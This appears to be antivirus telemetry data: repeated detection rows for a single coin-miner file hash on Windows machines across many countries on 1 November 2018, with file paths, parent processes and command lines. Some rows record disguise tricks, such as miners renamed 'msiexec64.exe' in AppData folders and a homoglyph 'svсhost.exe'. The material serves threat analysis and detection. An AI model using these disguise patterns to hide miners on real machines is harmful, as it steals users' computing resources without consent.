  Row(detection=Row(filename='avscan-20181101-134142-98ae7e5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0049131\\AVSCAN-20181101-134125-95938041\\AVSCAN-20181101-134142-98AE7E5D', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:41:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:58:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\Mining\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\New folder\\EquiMiner\\Database\\Resources\\Miners\\EWBF_200_9\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/V', country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=59392, timestamp='2018-11-01T03:11:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\zcash\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T06:06:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='idlemonitor.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\{DPQP8-MX9O8-3QDNT-MDW4T-YGBBS-GCNRV}\\idlemonitor.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\Programs\\EWBF\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:24:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\backup_log\\msIExEc64.ExE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:34:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\$RECYCLE.BIN\\S-1-5-21-153897562-1265273997-1534562455-1001\\$R6KQHBJ\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:20:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\ClipBoardSvc\\MSieXEc64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:34:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='F:\\2017_12_30_2\\NHML-1.8.2.0-Pre2\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2757616, timestamp='2018-11-01T09:20:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\desktop\\wp-encrypt\\Neuer Ordner (2)\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:56:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\Canon Network Tool\\msIExEc64.ExE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:26:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110413-7109123e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e057c42\\AVSCAN-20181101-105919-4BFF9353\\AVSCAN-20181101-110413-7109123E', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:34:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Program Files (x86)\\Common Files\\NTServices\\mSiexec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T05:38:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Program Files (x86)\\Common Files\\HTTPERR\\MsiexeC64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T05:38:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\Canon Network Tool_rt\\MSiEXEc64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:26:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110420-71db3bea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e057c42\\AVSCAN-20181101-105919-4BFF9353\\AVSCAN-20181101-110420-71DB3BEA', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:34:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\soft\\nhm_windows_1.9.0.5\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\nhm_windows_1.8.1.11\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:43:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101302-da0762ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7b9cd4a6\\AVSCAN-20181101-101238-D512283C\\AVSCAN-20181101-101302-DA0762FF', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:13:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\soft\\nhm_windows_1.9.0.5\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143753-cc77908c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_65e44405\\AVSCAN-20181101-143719-C5DFD252\\AVSCAN-20181101-143753-CC77908C', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:37:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Canon Network Tool_rt\\MSiEXEc64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:33:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\backup_log\\msIExEc64.ExE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:33:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\uTorrentDir\\mSiExEc64.ExE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:40:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='c:\\users\\X\\documents\\all miner\\multipoolminer\\bin\\equihash-ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:14:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\F:\\Marley Brinx\\zec\\Zec.miner.0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:26:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='svсhost.exe', filepath='C:\\Program Files\\svhost\\data\\svсhost.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/Install \\\\\\/Package \\\\\\/Quiet  \\\\\\/progressCLSID f1851d8e-504f-48a9-acf7-...ID f1851d8e-504f-48a9-acf7-a8c7ff709abe \\\\\\/ReportId AEE5B2D7-F0E6-4861-816E-4F4D8... AEE5B2D7-F0E6-4861-816E-4F4D87C5EE01.1 \\\\\\/FlightData \\\\\\"RS:20EA\\\\\\" \\\\\\"\\\\\\/CancelId\\\\\\" \\\\\\"410eec9d-0a7f-4410-a03a-1cb2d63e62b0\\\\\\" \\\\\\"\\\\\\/DeploymentSessionID\\\\\\" \\\\...\\\\" \\\\\\"\\\\\\/ActionListFile\\\\\\" \\\\\\"C:\\\\\\\\WINDOWS\\\\\\\\SoftwareDistribution\\\\\\\\Download\\\\\\\\5a223dad84471a4651eeae50b6830072\\\\\\\\ActionList.xml\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe', parentsize=827576, timestamp='2018-11-01T11:24:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110511-66eb88e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea1254c4\\AVSCAN-20181101-110418-5CCF95A5\\AVSCAN-20181101-110511-66EB88E6', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:05:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\nhm_windows_1.9.0.4 (1)\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:EXt62XVEJUC95XaB.1', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:22:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Music\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\"F:\\\\\\\\Kodi Video\\\\\\\\Zec Miner 0.3.4b.zip\\\\\\"', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Ashampoo\\Ashampoo ZIP 2017\\ASZIP.EXE', parentsize=34343216, timestamp='2018-11-01T20:50:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\AppData\\Local\\WinMiner\\Miners\\EWBF64_0.3.4\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\WinMiner\\WinMiner.exe', parentsize=4506640, timestamp='2018-11-01T07:31:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-020519-254a6e8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd5703d2\\AVSCAN-20181101-020438-1B8697BC\\AVSCAN-20181101-020519-254A6E8D', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:05:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Zec Miner 0.3.4b\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235717-6568764f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-235655-622049BD\\AVSCAN-20181101-235717-6568764F', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:58:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\nhm_windows_1.9.0.7\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe149_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe149 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T10:02:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235714-6511a8a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-235655-622049BD\\AVSCAN-20181101-235714-6511A8A7', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:58:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-022112-0394fd84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd5703d2\\AVSCAN-20181101-022102-0126B875\\AVSCAN-20181101-022112-0394FD84', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:21:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180011-cc674fe0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03535ed8\\AVSCAN-20181101-175937-C62B34C5\\AVSCAN-20181101-180011-CC674FE0', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:00:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235715-65293044', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-235655-622049BD\\AVSCAN-20181101-235715-65293044', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:58:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='F:\\win10pc\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='--allhard --logformat=singleline \\\\\\/s \\\\\\/a \\\\\\/l DESKTOP-QDGQVLH.log --defaultaction=ignore', country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Avira\\acer_Avira\\scancl\\scancl.exe', parentsize=528744, timestamp='2018-11-01T15:45:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\C.Framework\\MSIExec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T08:18:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\Zec Miner 0.3.4b\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:00:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110939-9a925cce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea1254c4\\AVSCAN-20181101-110748-853D8FC6\\AVSCAN-20181101-110939-9A925CCE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:09:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft.NET\\msiexec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T08:19:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\Google Cache\\msiexec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T12:40:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110122-1671b9fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_045ae3c8\\AVSCAN-20181101-110012-0DC52B01\\AVSCAN-20181101-110122-1671B9FA', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:01:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235716-6542ce29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-235655-622049BD\\AVSCAN-20181101-235716-6542CE29', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:58:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:15:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-202912-b76f7e33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41a488c1\\AVSCAN-20181101-202813-B0318BC4\\AVSCAN-20181101-202912-B76F7E33', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:29:08Z'), dt=datetime.date(2018, 11, 1)),
